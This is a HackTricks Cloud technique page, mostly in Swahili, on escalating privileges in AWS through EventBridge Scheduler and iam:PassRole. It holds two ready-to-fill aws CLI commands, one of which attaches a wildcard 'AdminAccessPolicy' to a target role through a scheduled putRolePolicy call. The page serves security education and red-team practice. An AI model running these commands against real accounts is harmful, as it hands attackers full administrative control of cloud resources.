HackTricks CloudAWS - EventBridge Scheduler Privesc
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
EventBridge Scheduler
Taarifa zaidi kuhusu EventBridge Scheduler katika:
AWS - EventBridge Scheduler Enum
iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)
Mshambuliaji mwenye ruhusa hizo ataweza create|update scheduler na kutumia vibaya ruhusa za scheduler role zilizounganishwa nayo ili kufanya kitendo chochote
Kwa mfano, wanaweza kusanidi schedule ili kuitisha Lambda function ambayo ni kitendo chenye template:
aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'
Mbali na vitendo vya huduma vinavyotumia template, unaweza kutumia universal targets katika EventBridge Scheduler kuitisha anuwai ya operesheni za API kwa huduma nyingi za AWS. Universal targets zinatoa unyumbulifu wa kuitisha karibu API yoyote. Mfano mmoja ni kutumia universal targets kuongeza “AdminAccessPolicy”, ukitumia role inayokuwa na sera ya “putRolePolicy”:
aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'
Marejeo
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
Jifunze na ufanye mazoezi ya GCP Hacking:
Jifunze na ufanye mazoezi ya Az Hacking:Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.